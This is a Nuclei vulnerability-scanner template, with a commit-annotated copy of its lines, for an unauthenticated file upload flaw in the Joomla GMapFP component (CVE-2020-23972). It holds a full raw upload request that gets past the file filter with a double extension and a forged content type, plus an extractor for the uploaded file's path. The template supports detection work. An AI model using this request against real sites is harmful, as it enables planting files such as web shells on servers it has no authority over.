nuclei-templates/cves/2020/CVE-2020-23972.yaml

id: CVE-2020-23972

info:
  name: Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload
  author: dwisiswant0
  severity: high
  description: |
    An attacker can access the upload function of the application
    without authenticating to the application and also can upload
    files due the issues of unrestricted file upload which can be
    bypassed by changing Content-Type & name file too double ext.
  reference:
    - https://www.exploit-db.com/exploits/49129
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-23972
    cwe-id: CWE-434
  tags: cve,cve2020,joomla

requests:
  - raw:
      - |
        POST /index.php?option=§component§&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Referer: {{BaseURL}}
        Connection: close

        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="option"

        com_gmapfp
        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="image1"; filename="nuclei.html.gif"
        Content-Type: text/html

        projectdiscovery

        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="no_html"

        no_html
        ------WebKitFormBoundarySHHbUsfCoxlX1bpS--

    payloads:
      component:
        - "com_gmapfp"
        - "comgmapfp"

    extractors:
      - type: regex
        part: body
        regex:
          - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"
misc changes 2021-01-02 04:56:15 +00:00			`id: CVE-2020-23972`
:fire: Add CVE-2020-23972 2020-12-01 09:25:33 +00:00
			`info:`
			`name: Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload`
			`author: dwisiswant0`
			`severity: high`
			`description: \|`
			`An attacker can access the upload function of the application`
			`without authenticating to the application and also can upload`
			`files due the issues of unrestricted file upload which can be`
			`bypassed by changing Content-Type & name file too double ext.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://www.exploit-db.com/exploits/49129`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 7.5`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2020-23972`
			`cwe-id: CWE-434`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`tags: cve,cve2020,joomla`
:fire: Add CVE-2020-23972 2020-12-01 09:25:33 +00:00
			`requests:`
Payloads positional update to keep the request format uniform 2021-08-22 18:09:33 +00:00			`- raw:`
:fire: Add CVE-2020-23972 2020-12-01 09:25:33 +00:00			`- \|`
			`POST /index.php?option=§component§&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9`
			`Referer: {{BaseURL}}`
			`Connection: close`

			`------WebKitFormBoundarySHHbUsfCoxlX1bpS`
			`Content-Disposition: form-data; name="option"`

			`com_gmapfp`
			`------WebKitFormBoundarySHHbUsfCoxlX1bpS`
			`Content-Disposition: form-data; name="image1"; filename="nuclei.html.gif"`
			`Content-Type: text/html`

			`projectdiscovery`

			`------WebKitFormBoundarySHHbUsfCoxlX1bpS`
			`Content-Disposition: form-data; name="no_html"`

			`no_html`
			`------WebKitFormBoundarySHHbUsfCoxlX1bpS--`
Payloads positional update to keep the request format uniform 2021-08-22 18:09:33 +00:00
			`payloads:`
			`component:`
			`- "com_gmapfp"`
			`- "comgmapfp"`

:fire: Add CVE-2020-23972 2020-12-01 09:25:33 +00:00			`extractors:`
			`- type: regex`
			`part: body`
			`regex:`
			`- "window\\.opener\\.(changeDisplayImage\|addphoto)\\(\"(.*?)\"\\);"`